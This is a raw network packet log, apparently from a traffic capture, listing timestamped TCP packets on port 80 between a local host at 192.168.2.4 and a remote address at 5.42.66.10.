May 6, 2024 07:53:04.264779091 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264791012 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264801979 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264816999 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.264836073 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.264844894 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.264909983 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264925957 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264935970 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264947891 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264950037 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.264960051 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264971972 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264978886 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.264985085 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264996052 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265002966 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.265007973 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265017033 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.265022039 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265033960 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265034914 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.265045881 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265055895 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.265058994 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265070915 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265078068 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.265084028 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265094995 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265098095 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.265106916 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265119076 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265124083 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.265132904 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.265160084 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.265161037 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265175104 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265186071 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265196085 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265198946 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.265207052 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265218019 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265223980 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.265229940 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265242100 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265247107 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.265254974 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265256882 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.265279055 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.265304089 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.265337944 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265350103 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265360117 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265372038 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265374899 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.265383959 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.265384912 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265397072 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265407085 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.265408993 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265414953 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.265419960 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265427113 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.265430927 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265444994 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265455008 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.265459061 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265470982 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265472889 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.265485048 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265495062 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.265496969 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265507936 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265518904 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265527964 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.265530109 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265542030 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265546083 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.265553951 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265558958 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.265564919 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265577078 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265587091 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.265588999 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265602112 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265609026 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.265614033 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265621901 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.265625954 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265636921 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265642881 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.265650988 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265661955 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.265662909 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265676022 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265681028 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.265686989 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265706062 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.265718937 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265727997 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.265732050 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265743971 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265754938 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265767097 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265769005 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.265794992 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.265809059 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.265813112 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265825987 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265836000 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265841961 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.265849113 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265860081 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265862942 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.265872002 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265880108 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.265897989 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.265907049 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265913963 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.265919924 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.265944004 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.265984058 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.265991926 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266004086 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266015053 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266027927 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266031027 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.266040087 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266043901 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.266050100 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266057968 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.266062975 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266074896 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266077995 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.266086102 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266088963 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.266098022 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266108036 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.266110897 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266120911 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266127110 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.266134024 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266145945 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266148090 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.266158104 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266158104 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.266170025 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266177893 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.266191959 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.266208887 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.266242027 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266253948 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266266108 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266273022 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.266279936 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266292095 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266298056 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.266304970 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266315937 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266319036 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.266326904 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266338110 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.266339064 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266345024 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.266351938 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266362906 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266366005 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.266375065 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266377926 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.266402006 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.266412020 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266413927 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.266423941 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266434908 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266447067 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.266448021 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266458035 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.266458988 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266473055 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266479969 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.266504049 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266515970 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266519070 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.266519070 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.266519070 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.266527891 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266536951 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.266549110 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.266551018 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266561985 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266566992 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.266591072 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.266598940 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266602039 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.266611099 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266622066 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266634941 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.266634941 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266647100 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266649961 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.266659021 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266670942 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.266689062 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.266695023 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.266730070 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266742945 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266752958 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266767025 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266779900 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266787052 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.266787052 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.266787052 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.266793013 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266804934 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266817093 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.266818047 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266829967 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266838074 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.266856909 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.266865015 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266870022 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.266877890 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266889095 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266900063 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.266901016 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266910076 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.266913891 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266927004 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266933918 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.266940117 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.266957998 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.266968966 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.266983986 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.266997099 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267007113 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267019033 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267030954 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267030954 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.267030954 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.267038107 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.267054081 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267056942 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.267066002 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.267066002 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267077923 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267087936 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.267096043 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267100096 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.267107964 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267118931 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.267119884 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267134905 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267143011 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.267149925 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267159939 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.267163992 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267172098 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.267177105 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267189026 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.267189980 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267201900 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.267201900 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267220020 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.267225027 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.267267942 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.267272949 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267286062 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267297029 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267308950 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267309904 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.267318964 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267323017 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.267327070 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267338991 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267344952 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.267349958 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267369032 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.267369032 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.267380953 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267388105 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.267394066 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267405033 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267410994 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.267417908 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267429113 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.267440081 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.267457008 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.267492056 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267504930 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267514944 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267523050 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.267528057 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267538071 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267544031 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.267549992 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267554045 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.267563105 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267565966 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.267575026 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267585039 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267591000 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.267596960 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267605066 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.267610073 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267617941 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.267621040 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267633915 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267637968 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.267646074 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267652035 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.267659903 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267663002 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.267672062 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267683983 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.267684937 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267694950 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.267710924 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.267720938 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.267754078 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267765045 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267775059 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267786980 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267790079 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.267800093 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267802000 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.267811060 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267819881 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.267822981 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267839909 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.267853975 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.267863035 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267870903 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.267874956 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267885923 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267896891 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267899036 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.267905951 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.267910004 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267921925 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267929077 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.267934084 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267939091 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.267947912 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267957926 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.267960072 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267971039 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.267976999 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.268013954 CEST	49741	80	192.168.2.4	5.42.66.10
